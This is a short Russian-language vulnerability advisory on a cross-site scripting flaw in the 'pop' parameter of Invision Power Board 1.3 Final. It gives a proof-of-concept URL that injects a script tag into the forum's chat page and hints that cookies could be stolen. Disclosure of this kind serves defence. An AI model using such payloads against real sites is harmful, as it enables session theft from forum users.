Межсайтовый скриптинг в Invision Power Board

Дата публикации:11.03.2004
Всего просмотров:2754
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Invision Power Board 1.3 Final

Описание: Уязвимость обнаружена в Invision Power Board. Удаленный пользователь может выполнить XSS нападение.

Форум не проверяет правильность данных, представленных пользователем в поле ‘pop’.

Пример/Эксплоит:

http://<host>/forum//index.php?s=&act=chat&pop=1;'><script>alert('this could be
 your cookie')</script><plaintext>

URL производителя: http://www.invisionboard.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Invision Power Board v1.3 Final Cross Site Scripting 2 - Addon